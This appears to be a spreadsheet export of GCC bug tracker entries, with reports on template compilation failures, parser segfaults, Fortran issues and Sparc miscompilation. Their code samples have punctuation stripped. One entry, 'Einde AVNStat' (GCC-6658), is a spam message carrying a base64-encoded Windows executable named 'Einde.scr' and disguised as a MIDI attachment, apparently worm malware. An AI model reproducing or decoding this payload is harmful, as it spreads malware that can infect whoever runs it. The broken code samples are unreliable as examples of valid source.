Backlink: https://sourceware.org/bugzilla/show_bug.cgi?id=19571</t>
  </si>
  <si>
    <t>GCC-6088</t>
  </si>
  <si>
    <t>templates calling static member functions won't compile</t>
  </si>
  <si>
    <t>When trying to compile the converion detection example from the article
	Mappings between Types and Values
by
	Andrei Alexandrescu
at
	http://www.cuj.com/experts/1810/alexandr.htm?topic=experts
it simply didn't compile with the error message (2.95.2 and 2.95.4 neither):
------------------------------------------------
$ g++-3.0 -v -save-temps -o s s.cc
Reading specs from /usr/lib/gcc-lib/i386-linux/3.0.3/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.0.3
 /usr/lib/gcc-lib/i386-linux/3.0.3/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=3 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ s.cc s.ii
GNU CPP version 3.0.3 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-v3
 /usr/include/g++-v3/i386-linux
 /usr/include/g++-v3/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.0.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.0.3/cc1plus -fpreprocessed s.ii -quiet -dumpbase s.cc -version -o s.s
GNU CPP version 3.0.3 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.3 (i386-linux)
        compiled by GNU C version 3.0.3.
s.cc: In instantiation of `Conversion':
s.cc:11:   instantiated from here
s.cc:11: invalid use of undefined type `class Conversion'
s.cc:3: forward declaration of `class Conversion'
------------------------------------------------
The SGI 7.3 and the Sun C++ 5.1 work all right and I can't see any illigal
stuff done there.
I just include the source.
Release:
3.0.3 (Debian testing/unstable)
Environment:
System: Linux zaphod 2.4.18 #4 SMP Sun Mar 10 00:00:34 CET 2002 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
# 1 s.cc
template 
class Conversion
{
        public:
                static T MakeT()
                enum { exists = sizeof(MakeT()) }
}
int main()
{
        int i = Conversion::exists
}</t>
  </si>
  <si>
    <t>claudius.link</t>
  </si>
  <si>
    <t>GCC-32954</t>
  </si>
  <si>
    <t>pack with -fdefault-integer-8</t>
  </si>
  <si>
    <t>This bug is for the mask issues with -fdefault-integer-8
which cause (among others) the failures in minmaxloc etc.</t>
  </si>
  <si>
    <t>GCC-9099</t>
  </si>
  <si>
    <t>[3.4 regression] Segfault with new parser</t>
  </si>
  <si>
    <t>One of the test cases from PR 50 now ICEs (segfault):
struct A { typedef int I }
int main(void)
{
	int * p
	p-&gt;A::I::~I()
}
Release:
3.4 right after new parser merge
How-To-Repeat:
.</t>
  </si>
  <si>
    <t>GCC-19924</t>
  </si>
  <si>
    <t>[AVR] MODES_TIEABLE incorrect</t>
  </si>
  <si>
    <t>MODES_TIEABLE in avr is set such that access to subreg is prevented.
This result is significantly sub-optimal code.
Attached patch changes this. No regressions have been found with test suite -
indeed things got better!
Note this is related to PR/19815 documentation error.</t>
  </si>
  <si>
    <t>GCC-33284</t>
  </si>
  <si>
    <t>ENTRY and INTRINSIC with same name</t>
  </si>
  <si>
    <t>I think the following is invalid but not rejected:
SUBROUTINE a
 intrinsic  cos
entry cos(x)
 real x
 x = 0
end subroutine
end
NAG f95 shows:
Error: a.f90 line 5: Multiply defined symbol COS
Ifort shows:
fortcom: Error: a.f90 line 2: Conflicting attributes or multiple declaration of name.   [COS]</t>
  </si>
  <si>
    <t>GCC-65072</t>
  </si>
  <si>
    <t>Segfault when parsing dectlype in trailing return type</t>
  </si>
  <si>
    <t>uroc327</t>
  </si>
  <si>
    <t>GCC-7086</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] compile time regression</t>
  </si>
  <si>
    <t>built from today's CVS:
gcc -v
Using built-in specs.
Configured with: ../gcc/configure --enable-languages=cc++ --prefix=/usr --exec-prefix=/usr
Thread model: single
gcc version 3.2 20020619 (experimental)
occurs with both native i686-pc-linux-gnu and cross compiler for target sh-elf.
Release:
CVS 20062002 mainline
Environment:
i686-pc-linux-gnu
How-To-Repeat:
g++ -O2 -c broken.cc</t>
  </si>
  <si>
    <t>GCC-60292</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in fill_vec_av_set at sel-sched.c:3863 with -m64 after r206174 on powerpc-apple-darwin9.8.0</t>
  </si>
  <si>
    <t>Compiling the test gfortran.dg/pr44691.f with -m64 -O2 -fselective-scheduling2 gives the following ICE
/opt/gcc/work/gcc/testsuite/gfortran.dg/pr44691.f:39:0: internal compiler error: in fill_vec_av_set at sel-sched.c:3863
       END
Line 3863 of sel-sched.c is the gcc_assert
          /* A fence insn should not get here.  */
          gcc_assert (!fence_insn_p)
introduced by r206174.</t>
  </si>
  <si>
    <t>GCC-58397</t>
  </si>
  <si>
    <t>Please add host_hooks for NetBSD to make precompiled headers work</t>
  </si>
  <si>
    <t>Created attachment 30802
build glue changes
As discussed in #58370 and #58379 precompiled headers do not work on NetBSD hosts. To fix this a new gcc/config/host-netbsd.c file and the needed build glue is attached.
This is mostly a copy of the openbsd stuff with a few minor changes (like adding MAP_FIXED which is needed on NetBSD) and adding a different address for sparc64 machines.</t>
  </si>
  <si>
    <t>GCC-29089</t>
  </si>
  <si>
    <t>Words substituted for %s in a sentence can not be translated</t>
  </si>
  <si>
    <t>In gcc/cp/typeck.c there are these messages:
pedwarn (ISO C++ forbids %sing an enum
         (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
	 ? increment : decrement)
error (cannot %s a pointer to incomplete type %qT
       ((code == PREINCREMENT_EXPR
	 || code == POSTINCREMENT_EXPR)
	? increment : decrement) TREE_TYPE (argtype))
pedwarn (ISO C++ forbids %sing a pointer of type %qT
	 ((code == PREINCREMENT_EXPR
	   || code == POSTINCREMENT_EXPR)
	  ? increment : decrement) argtype)
Here increment and decrement will not be translated.  Composing sentences like this also makes translation hard probably impossible in some languages.  Please make two complete separate messages for each case.</t>
  </si>
  <si>
    <t>GCC-10702</t>
  </si>
  <si>
    <t>incorrect code generated on Sparc for expression combining increment and decrement of same variable</t>
  </si>
  <si>
    <t>The code included below does not provide the expected
result when compiled on a sparc-sun-solaris platform.  It
does work on Intel platforms.
Expected result: the return value of the program should be 2 (x is incremented once and decremented once).
Observed result with gcc-3.2.1 (and older versions such as
2.95): 1.  Only the first operation is executed (x--).
------------------------
int x = 2
int
main (int argc
      char *argv[])
{
  int y
  y = x-- * x++
  return x
}
------------------------
You can also test this by replacing return x by some
printf() statements if you want to see the result printed
instead of having to check the return code of the program.
Additional comments:
- Using char or short instead of int produces the
  correct result.  The bug affects (long) integers and
  pointers.
- This can be tested with various expressions including
  more than one operation on the same variable.  For
  example this problem can be tested with pointers by
  declaring x to be of type char * and using the
  expression y = (x++ == x--).
- Only the first operation in the expression produces its
  expected side effect on x.  So using y = x++ * x-- will
  only increment x by 1 while y = x-- * x++ will only
  decrement x by 1.
- It is necessary to assign the result of the expression to
  some variable or to use it in some way in order to trigger
  this bug.  If you replace y = x-- * x++ by the simpler
  statement x-- * x++ then the result will be correct.
- Using the option -Wall or -Wsequence-point produces the
  expected warning operation on `x' may be undefined but
  I would have expected the result of the expression to be
  undefined not the final value of x.  Also the same
  program returns the correct value on other platforms such
  as i*86-gnu-linux.
Release:
3.2.1
Environment:
sparc-sun-solaris2.6 and sparc-sun-solaris2.8
Output from gcc -v:
Reading specs from /Local/lib/gcc-lib/sparc-sun-solaris2.6/3.2.1/specs
Configured with: ../gcc-3.2.1/configure --prefix=/Local --with-local-prefix=/Local --with-gnu-ld --with-gnu-as --with-ld=/Local/bin-gnu/ld --with-as=/Local/bin-gnu/as --enable-threads --disable-shared --enable-languages=cc++f77objc --disable-libgcj
Thread model: posix
gcc version 3.2.1
In case this can be useful ld and as are from binutils-2.13.1
How-To-Repeat:
gcc -Wall test.c
./a.out
echo $?</t>
  </si>
  <si>
    <t>raphael.quinet</t>
  </si>
  <si>
    <t>GCC-32223</t>
  </si>
  <si>
    <t>Backslash handling inconsistent</t>
  </si>
  <si>
    <t>This compiled with out a warning on older versions of gfortran. It does not seem to like the '\0' but it says something else -
[dranta:~/tests/gfortran-D] dir% gfortran -c linlab.f
linlab.f:3.33:
      data bzero /'0' '.' '0' '\0''0'/                              
                                1
Warning: initialization string truncated to match variable at (1)
[dranta:~/tests/gfortran-D] dir% cat linlab.f
      subroutine linlab
      character*1 bzero(5)
      data bzero /'0' '.' '0' '\0''0'/
      return
      end
[dranta:~/tests/gfortran-D] dir% gfortran --v
Using built-in specs.
Target: powerpc-apple-darwin8.9.0
Configured with: ../gcc/configure --enable-checking --disable-multilib --prefix=/usr/local/gfortran --enable-languages=cfortran
Thread model: posix
gcc version 4.3.0 20070604 (experimental)</t>
  </si>
  <si>
    <t>GCC-6658</t>
  </si>
  <si>
    <t>Einde AVNStat</t>
  </si>
  <si>
    <t xml:space="preserve"> --Z5AO35I461aT141E019706
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 --Z5AO35I461aT141E019706
 Content-Type: audio/x-midi
 	name=Einde.scr
 Content-Transfer-Encoding: base64
 Content-ID: 
 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
 RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
 GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
 UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
 QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
 ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
 AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
 QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
 AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAAB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FWL7IPsFItF
 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
